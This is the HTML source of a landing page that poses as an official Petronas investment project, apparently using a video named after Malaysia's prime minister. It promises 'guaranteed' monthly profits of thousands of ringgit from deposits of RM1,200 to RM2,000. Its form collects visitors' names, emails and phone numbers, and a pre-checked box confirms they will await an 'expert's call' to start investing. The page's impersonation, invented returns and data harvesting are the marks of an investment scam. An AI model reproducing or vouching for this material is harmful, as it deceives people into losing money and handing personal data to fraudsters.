<!DOCTYPE html><html>
<head>
    <meta charset="UTF-8">
    <link rel="icon" href="./images/favicon.ico">
    <link rel="stylesheet" type="text/css" href="css/intlphone.css"><style>
.overlay-atDs4nI4tg { position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: rgba(0, 0, 0, 0.8); z-index: 1000; -webkit-box-pack: center; -webkit-justify-content: center; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -webkit-box-align: center; -ms-flex-align: center; align-items: center; overflow-y: auto; display: none; }
.lds-spinner-atDs4nI4tg { color: official; display: inline-block; position: relative; width: 80px; height: 80px; }
.lds-spinner-atDs4nI4tg div { transform-origin: 40px 40px; animation: lds-spinner-atDs4nI4tg 1.2s linear infinite; }
.lds-spinner-atDs4nI4tg div:after { content: " "; display: block; position: absolute; top: 3px; left: 37px; width: 6px; height: 18px; border-radius: 20%; background: #fff; }
.lds-spinner-atDs4nI4tg div:nth-child(1) { transform: rotate(0deg); animation-delay: -1.1s; }
.lds-spinner-atDs4nI4tg div:nth-child(2) { transform: rotate(30deg); animation-delay: -1s; }
.lds-spinner-atDs4nI4tg div:nth-child(3) { transform: rotate(60deg); animation-delay: -0.9s; }
.lds-spinner-atDs4nI4tg div:nth-child(4) { transform: rotate(90deg); animation-delay: -0.8s; }
.lds-spinner-atDs4nI4tg div:nth-child(5) { transform: rotate(120deg); animation-delay: -0.7s; }
.lds-spinner-atDs4nI4tg div:nth-child(6) { transform: rotate(150deg); animation-delay: -0.6s; }
.lds-spinner-atDs4nI4tg div:nth-child(7) { transform: rotate(180deg); animation-delay: -0.5s; }
.lds-spinner-atDs4nI4tg div:nth-child(8) { transform: rotate(210deg); animation-delay: -0.4s; }
.lds-spinner-atDs4nI4tg div:nth-child(9) { transform: rotate(240deg); animation-delay: -0.3s; }
.lds-spinner-atDs4nI4tg div:nth-child(10) { transform: rotate(270deg); animation-delay: -0.2s; }
.lds-spinner-atDs4nI4tg div:nth-child(11) { transform: rotate(300deg); animation-delay: -0.1s; }
.lds-spinner-atDs4nI4tg div:nth-child(12) { transform: rotate(330deg); animation-delay: 0s; }
@keyframes lds-spinner-atDs4nI4tg {
	0% { opacity: 1; }
	100% { opacity: 0; }
}
.visible-atDs4nI4tg { display: -webkit-box; display: -webkit-flex; display: -ms-flexbox; display: flex; }
</style>    <meta charset="utf-8">
    <title>Petronas</title>
    <meta name="description" content="Startup HTML template OptimizedHTML 5">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="icon" href="favicon.ico">
    <meta property="og:image" content="images/preview.jpg">
    <link rel="stylesheet" href="css/app.min.css">
    <style>
        .overlay-uZchj22fL8 {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1000;
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -ms-flex-pack: center;
            justify-content: center;
            -webkit-align-items: center;
            -webkit-box-align: center;
            -ms-flex-align: center;
            align-items: center;
            overflow-y: auto;
            display: none;
        }

        .lds-spinner-uZchj22fL8 {
            color: official;
            display: inline-block;
            position: relative;
            width: 80px;
            height: 80px;
        }

        .lds-spinner-uZchj22fL8 div {
            transform-origin: 40px 40px;
            animation: lds-spinner-uZchj22fL8 1.2s linear infinite;
        }

        .lds-spinner-uZchj22fL8 div:after {
            content: " ";
            display: block;
            position: absolute;
            top: 3px;
            left: 37px;
            width: 6px;
            height: 18px;
            border-radius: 20%;
            background: #fff;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(1) {
            transform: rotate(0deg);
            animation-delay: -1.1s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(2) {
            transform: rotate(30deg);
            animation-delay: -1s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(3) {
            transform: rotate(60deg);
            animation-delay: -0.9s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(4) {
            transform: rotate(90deg);
            animation-delay: -0.8s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(5) {
            transform: rotate(120deg);
            animation-delay: -0.7s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(6) {
            transform: rotate(150deg);
            animation-delay: -0.6s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(7) {
            transform: rotate(180deg);
            animation-delay: -0.5s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(8) {
            transform: rotate(210deg);
            animation-delay: -0.4s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(9) {
            transform: rotate(240deg);
            animation-delay: -0.3s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(10) {
            transform: rotate(270deg);
            animation-delay: -0.2s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(11) {
            transform: rotate(300deg);
            animation-delay: -0.1s;
        }

        .lds-spinner-uZchj22fL8 div:nth-child(12) {
            transform: rotate(330deg);
            animation-delay: 0s;
        }

        @keyframes lds-spinner-uZchj22fL8 {
            0% {
                opacity: 1;
            }

            100% {
                opacity: 0;
            }
        }

        .visible-uZchj22fL8 {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
        }
    </style>
</head>

<body>

    <main class="main">
        <section class="header">
            <div class="header__wrap">
                <div class="header__logo logo">
                    <a href="#" class="logo__link">
                        <img src="images/logo.svg" alt="" class="logo__img">
                    </a>
                </div>
                <nav class="header__menu menu">
                    <ul class="menu__ul">
                        <li class="menu__li">
                            <a href="#form1" class="menu__a">INFORMATION</a>
                        </li>
                        <li class="menu__li">
                            <a href="#form1" class="menu__a">BUSINESS AREA</a>
                        </li>
                        <li class="menu__li">
                            <a href="#form1" class="menu__a">PRESS ROOM</a>
                        </li>
                        <li class="menu__li">
                            <a href="#form1" class="menu__a">INTRODUCTION</a>
                        </li>
                    </ul>
                </nav>
                <div class="header__search search"><input type="text" class="search__input">
                    <div class="search__wrap">
                        <input type="submit" class="search__submit" value="">
                    </div>
                </div>
            </div>
        </section>

        <!-- @format -->
        <section class="lead">
            <div class="lead__wrap">
                <div class="lead__row">
                    <h1 class="lead__h1">
                      Malaysian People Enrichment Project
                    </h1>
                </div>
                <div class="lead__row">
                    <div class="lead__column lead__column-video">
                        <p class="lead__desc">
                          Get the opportunity to earn RM13,800 from all of Asia's oil.
                        </p>
                        <div class="lead__video video">
                            <div class="video__wrap">
                                <video controls="" autoplay="" class="video__container" loading="lazy" poster="images/video__placeholder-15-40.png">
                                    <source src="media/Anwar-Ibrahim-1538.mp4" type="video/mp4">
                                    Your browser does not support HTML video.
                                </video>
                            </div>
                        </div>
                    </div>
                    <div class="lead__column">
                        <style>
                            .iti {
                                display: block !important;
                                width: 100%;
                            }
                        </style>
                            <form action="" method="post" class="lead__form form" id="form1"><input type="hidden" name="task" value="process">
<input type="hidden" name="click" value="9225123">
<input type="hidden" name="flow" value="2410">
<input type="hidden" name="from" value="3078">
<input type="hidden" name="country" value="my">                            <p class="form__head">START EARNING INCOME WITH OIL SOURCES</p>
                            <input type="text" name="name" class="form__input" placeholder="Name" required="">
                            <input type="text" name="lastname" class="form__input" placeholder="Surname" required="">
                            <input type="email" name="email" class="form__input" placeholder="E-mail" required="">
                            <input type="tel" name="phone" class="form__input" placeholder="" required="">
                            <input type="submit" class="form__submit" value="Send a request">

                            
                            <div class="form__checkbox checkbox" style="display: flex; margin-top: 15px;">
                                <input type="checkbox" class="checkbox__input" id="checkbox" checked="">
                                <label for="checkbox" class="checkbox__label">
                                  I confirm that I will wait for the expert's call and start investing and making money
                                </label>
                                <input type="hidden" name="phonecc" class="phonecc" value="">
                                <input type="hidden" name="country" value="my">
                                
                    </div></form>
                </div>
            </div>
        </div></section>

        <style>
            @media screen and (max-width: 550px) {
                .lead__caption {
                    display: none !important;
                }
            }
        </style>

        <!-- @format -->
        <section class="about">
            <div class="about__wrap">
                <div class="about__row">
                    <p class="about__header">How will investors earn RM13,800 per month with Petronas?</p>
                    <p class="about__txt">
                      We have decided to open up investment access to all citizens because it will benefit both <strong>Petronas</strong> and the people of Malaysia
                    </p>
                    <p class="about__txt">
                      The demand for the purchase of oil and gas is rapidly growing worldwide. That's why we decided to double oil and gas production and attract investors from all over Malaysia. Considering that oil and gas prices change quickly, each investor in the <strong>Petronas</strong> project earns an average of <strong>RM13,800 per month</strong>.
                    </p>
                </div>
                <div class="about__row">
                    <div class="about__promo promo">
                        <img src="images/about__img.jpg" alt="" class="promo__img">
                    </div>
                </div>
            </div>
        </section>

        <!-- @format -->
        <section class="cards">
            <div class="cards__wrap">
                <div class="cards__row">
                    <p class="cards__header">Petronas Investment Project</p>
                </div>
                <div class="cards__row cards__row-intent">
                    <div class="cards__item item">
                        <div class="item__wrap item-sea">
                            <div class="item__header">Extraction of resources at sea</div>

                            <ul class="item__txt">
                                <li class="item__li">Minimum investment - RM1200</li>
                                <li class="item__li">Average profit - RM10,300</li>
                                <li class="item__li">Guaranteed profit - RM7,300 per month</li>
                                <li class="item__li">Number of spots - 70 thousand</li>
                            </ul>

                            <div class="item__button">
                                <a href="#form1" class="item__link">Send a request</a>
                            </div>
                        </div>
                    </div>
                    <div class="cards__item item">
                        <div class="item__wrap item-tube">
                            <div class="item__header">Extraction of land resources</div>

                            <ul class="item__txt">
                                <li class="item__li">Minimum investment - RM1500</li>
                                <li class="item__li">Average profit - RM16,246</li>
                                <li class="item__li">
                                  Guaranteed profit - from RM8700 per month
                                </li>
                                <li class="item__li">Number of spots - 90 thousand</li>
                            </ul>

                            <div class="item__button">
                                <a href="#form1" class="item__link">Send a request</a>
                            </div>
                        </div>
                    </div>
                    <div class="cards__item item">
                        <div class="item__wrap item-evening">
                            <div class="item__header">Extraction of unconventional resources</div>

                            <ul class="item__txt">
                                <li class="item__li">Minimum investment - RM2000</li>
                                <li class="item__li">Average profit - RM19,389</li>
                                <li class="item__li">Guaranteed profit - from RM9900 per month</li>
                                <li class="item__li">Number of spots - 30 thousand</li>
                            </ul>

                            <div class="item__button">
                                <a href="#form1" class="item__link">Send a request</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>

 
        <section class="after">
            <div class="after__wrap">
                <div class="after__about">
                    <div class="after__txt">
                        Thank you for the support from the Malaysian Welfare Fund; I am delighted that our project is of national interest. This project will enable all Malaysians to earn income from valuable resources, as the demand for oil is increasing every day. Our goal is to attract investors from across the country and help them earn as many dividends as possible.
                    </div>
                    <div class="after__quote">Company Director: Tengku Muhammad Taufik</div>
                </div>
                <div class="after__pic">
                    <img src="images/block__man.jpg" alt="" class="after__img">
                </div>
            </div>
        </section>

      
    </main>



    <footer class="footer">
        <div class="footer__wrap">
            <div class="footer__logo">
                <img src="images/footer__logo.png" alt="" class="footer__pic">
            </div>
            <div class="footer__contact">
                <div class="footer__txt footer__txt-head">Contact</div>
                <div class="footer__txt">Monday - Friday: from 8:00 AM to 8:00 PM.</div>
                <div class="footer__txt">Saturday: from 8:00 AM to 2:00 PM.</div>
                <div class="footer__txt">Sunday and public holidays: closed</div>
                <div class="footer__email email">
                    <a href="#form1" class="email__link">
                        <img src="images/footer__email.png" alt="" class="email__icon">
                        <span class="email__txt"> E-mail</span>
                    </a>
                </div>
                <div class="footer__social social">
                    <div class="social__item">
                        <a href="#form1" class="social__link">
                            <img src="images/footer__insta.png" alt="" class="social__icon social__icon-insta">
                        </a>
                    </div>
                    <div class="social__item">
                        <a href="#form1" class="social__link">
                            <img src="images/footer__fb.png" alt="" class="social__icon social__icon-fb">
                        </a>
                    </div>
                    <div class="social__item">
                        <a href="#form1" class="social__link">
                            <img src="images/footer__in.png" alt="" class="social__icon social__icon-in">
                        </a>
                    </div>
                    <div class="social__item">
                        <a href="#form1" class="social__link">
                            <img src="images/footer__yt.png" alt="" class="social__icon social__icon-yt">
                        </a>
                    </div>
                </div>
            </div>

            <div class="footer__menu">
                <ul class="footer__ul footer__ul-about">
                    <li class="footer__li">
                        <a href="#form1" class="footer__link">INFORMATION</a>
                    </li>
                    <li class="footer__li">
                        <a href="#form1" class="footer__link">ACTIVITY AREAS</a>
                    </li>
                    <li class="footer__li">
                        <a href="#form1" class="footer__link">PRESS ROOM</a>
                    </li>
                    <li class="footer__li">
                        <a href="#form1" class="footer__link">CONTACT</a>
                    </li>
                </ul>
            </div>
        </div>
    </footer>



    <style>
        .overlay-5UQakX82WQ {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1000;
            -webkit-box-pack: center;
            -webkit-justify-content: center;
            -ms-flex-pack: center;
            justify-content: center;
            -webkit-align-items: center;
            -webkit-box-align: center;
            -ms-flex-align: center;
            align-items: center;
            overflow-y: auto;
            display: none;
        }

        .lds-spinner-5UQakX82WQ {
            color: official;
            display: inline-block;
            position: relative;
            width: 80px;
            height: 80px;
        }

        .lds-spinner-5UQakX82WQ div {
            transform-origin: 40px 40px;
            animation: lds-spinner-5UQakX82WQ 1.2s linear infinite;
        }

        .lds-spinner-5UQakX82WQ div:after {
            content: " ";
            display: block;
            position: absolute;
            top: 3px;
            left: 37px;
            width: 6px;
            height: 18px;
            border-radius: 20%;
            background: #fff;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(1) {
            transform: rotate(0deg);
            animation-delay: -1.1s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(2) {
            transform: rotate(30deg);
            animation-delay: -1s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(3) {
            transform: rotate(60deg);
            animation-delay: -0.9s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(4) {
            transform: rotate(90deg);
            animation-delay: -0.8s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(5) {
            transform: rotate(120deg);
            animation-delay: -0.7s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(6) {
            transform: rotate(150deg);
            animation-delay: -0.6s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(7) {
            transform: rotate(180deg);
            animation-delay: -0.5s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(8) {
            transform: rotate(210deg);
            animation-delay: -0.4s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(9) {
            transform: rotate(240deg);
            animation-delay: -0.3s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(10) {
            transform: rotate(270deg);
            animation-delay: -0.2s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(11) {
            transform: rotate(300deg);
            animation-delay: -0.1s;
        }

        .lds-spinner-5UQakX82WQ div:nth-child(12) {
            transform: rotate(330deg);
            animation-delay: 0s;
        }

        @keyframes lds-spinner-5UQakX82WQ {
            0% {
                opacity: 1;
            }

            100% {
                opacity: 0;
            }
        }

        .visible-5UQakX82WQ {
            display: -webkit-box;
            display: -webkit-flex;
            display: -ms-flexbox;
            display: flex;
        }
    </style>
    <style>
        .iti--allow-dropdown {
            width: 100%;
        }

        .iti__selected-dial-code,
        .iti__country {
            color: black;
        }

        .iti__selected-dial-code {
            color: black !important;
        }


        input {
            color: white;
        }

        .iti__country-list {
            left: 0;
        }

        .iti--allow-dropdown input {
            padding-left: 100px !important;
        }

        .iti__flag-container {
            z-index: 155 !important;
        }
    </style>

<script type="text/javascript" src="js/intlphone.js"></script>
<script type="text/javascript">
function intlTelSetGeoCode( code ) {
	var geofields = document.querySelectorAll("input[name=country]");
	for ( var gid = 0; gid < geofields.length; gid++ ) geofields[gid].value = code;
}
function intlTelSetPhoneCode( code ) {
	var phonecode = document.querySelectorAll(".phonecc");
	for ( var pid = 0; pid < phonecode.length; pid++ ) phonecode[pid].value = code;
}
var allthephonefields = document.querySelectorAll("input[name=phone]");
var initialphonecc = 0;
var initialphonegc = false;
for ( var atpi = 0; atpi < allthephonefields.length; atpi++ ) {
	var iti = window.intlTelInput( allthephonefields[atpi], {
    "initialCountry": "my",
    "nationalMode": false,
    "autoPlaceholder": "aggressive",
    "formatOnDisplay": true,
    "separateDialCode": true,
    "onlyCountries": [
        "my"
    ]
});
	var itg = iti.getSelectedCountryData();
	if ( itg.dialCode ) initialphonecc = itg.dialCode;
	if ( itg.iso2 ) initialphonegc = itg.iso2;
	allthephonefields[atpi].addEventListener( "countrychange", function( event ) {
		var iti = window.intlTelInputGlobals.getInstance( event.target );
		if ( iti != undefined ) {
			var geo = iti.getSelectedCountryData();
			intlTelSetPhoneCode( geo.dialCode );
			intlTelSetGeoCode( geo.iso2 );
		}
	});
}
if ( initialphonecc ) intlTelSetPhoneCode( initialphonecc );
if ( initialphonegc ) intlTelSetGeoCode( initialphonegc );
</script><div class="overlay-atDs4nI4tg"><div class="lds-spinner-atDs4nI4tg"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div></div><script>document.querySelectorAll('form').forEach( (e) => e.addEventListener('submit', () => document.querySelector('.overlay-atDs4nI4tg').classList.add("visible-atDs4nI4tg") ));</script>

</body></html>